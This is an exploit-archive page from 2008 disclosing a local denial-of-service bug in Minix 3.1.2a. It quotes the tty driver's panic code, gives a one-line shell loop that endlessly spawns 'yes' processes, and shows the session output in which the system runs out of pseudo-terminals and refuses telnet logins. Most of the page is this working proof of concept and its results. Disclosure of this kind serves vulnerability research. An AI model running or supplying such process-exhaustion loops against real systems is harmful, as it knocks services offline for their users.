minix 3.1.2a tty panic Local Denial of Service Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : minix 3.1.2a tty panic Local Denial of Service Vulnerability
# Published : 2008-07-23
# Author : kokanin
# Previous Title : minix 3.1.2a tty panic Remote Denial of Service Vulnerability
# Next Title : IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC

# kokanin@gmail 20080723
# minix 3.1.2a tty panic

trunk/src/drivers/tty/tty.c

 14965	  if ((status = send(replyee, &tty_mess)) != OK) {
 14966	        panic("TTY","tty_reply failed, statusn", status);

$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C

...disconnected

telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.

hai, no moar pty, kthxbye
--
kokanin

# www.Syue.com [2008-07-23]